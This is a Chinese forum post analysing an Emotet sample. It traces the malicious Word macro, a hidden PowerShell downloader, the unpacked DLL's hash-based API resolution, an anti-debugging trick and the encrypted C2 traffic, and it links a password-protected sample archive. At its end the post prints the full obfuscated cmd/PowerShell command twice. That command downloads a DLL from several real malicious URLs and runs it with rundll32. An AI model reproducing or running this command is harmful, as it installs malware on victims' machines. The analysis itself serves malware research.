首页
社区
课程
招聘
[原创]Emotet病毒分析之dll
发表于: 2021-1-5 19:01 7323

[原创]Emotet病毒分析之dll

2021-1-5 19:01
7323

Emotet,最近比较活跃,分享一个比较新的版本。依旧还是小白一个

文件名称: 8760_Z-55353.doc

MD5: 9B848638A47AAF9EAC9D21CD1EBB1B3E

SHA256: BA817F35FCE65F20C11D9E0A0C53B54248D825801DA89E455DDF1BBC3FA4CB7A

得到了样本

可以看到"安全警告 宏已被禁用" 启动内容 alt+f11查看宏代码

调试看到变量 Mrfzpndjp3s0k 是关键信息

执行如下宏代码

值得在意的就是PowerShell代码 -ENCOD 表示支持 base64 编码

解混淆之后

得到如下url

VirusTotal 标为恶意url

下载 payload 到系统目录下

从宏代码中可以分析出 下载的 payload 通过 RunDLL32.exe 运行

通过命令去执行:rundll32.exe Ppnq9j.dll #1

通过火绒剑可以看到在不断与C2服务器收发数据

MD5: FB9BA59D6C8E03C970323085E39C0290

SHA256: 406281452C48E699BD85F73977F80926812E9340F165BD4E61154C8E8961E61D

看一下导出表和导入表

导出表有一个关键函数"RunDLL"

导入表有敏感的函数 VirtualAlloc GetProcAddress

资源表中有不明的2进制数据

直接进入IDA查看 RunDLL()

写一个启动器,方便调试

通过函数 My_10001F80_Decode 解密之后,把变量v5 dump出来得到一个PE文件

同样也有一个RunDLL,并且没有导入表

解密算法如下: 在 offset 0x10001F80

新dump出来的DLL文件拖进 IDA 中可以看到RunDLL()只有两个函数

而 sub_10009716() 中,是比较复杂的循环结构与选择结构,没有可以直接看到的API

几乎都是通过 HASH 值的方式调用 API

进入 v7() 也就是新的 RunDLL() 在 offset 0x56E8

为了在IDA中方便观察,要把 v7 dump出来

然而可惜的是 IDA 识别不出RunDLL,所以我猜测,样本在解密之后可能加了混淆,或者是执行了初始化什么的操作

不过也阻挡不了我分析它。

在 0x00156135 会获得API ,跑一下OD脚本,把调用的 API 写在提前新增的区段 看一下大概的流程

API

比较有意思的是,到执行 WaitForSingleObject 的时候 OD 就卡住了,中间会创建一个事件对象,以及一个线程,然后通过 WaitForSingleObject 去等待这个事件对象。

而线程中则会通过 ReadDirectoryChangesW 函数,检索描述指定目录中的更改的信息。以及设置事件对象。

而如果想单步步过 ReadDirectoryChangesW 函数,OD就直接未响应,所以这个函数调用需要NOP掉,这是一个不常见的反调试。

再次跑OD可以看到如下API

加载的DLL如下

获取机器名

遍历进程,保存信息

拷贝到一起

加密数据

通过RSA 和 AES 算法加密

CryptExportKey 填充data

CryptGetHashParam 填充data

0016475B 得到%u.%u.%u.%u
001647CA sprintf 成 C2 服务器

服务器在0x16F200的位置

C2 服务器

把数据包发送出去

不同的服务器也会接收数据

解密数据

解密后,是一串暂时没法解析的数据,然后又继续循环发包了

会多次调用 InternetReadFile 下载数据并解密之后,通过 VirtualAlloc 申请空间,CreateThread 创建线程运行恶意 paylaod。

再往后就没跟进了。

​ 之前分析过类似的样本,所以知道大概的流程。难点就在于,要通过一些技巧对抗样本阻止逆向的手段。

https://bbs.pediy.com/upload/tmp/906247_FQ2A352MFDA7KNU.rar
样本上传了,密码是kanxue

 
 
 
 
 
 
 
 
 
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. &  POwersheLL -w hidden -ENCOD                 IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA==
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. &  POwersheLL -w hidden -ENCOD                 IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAA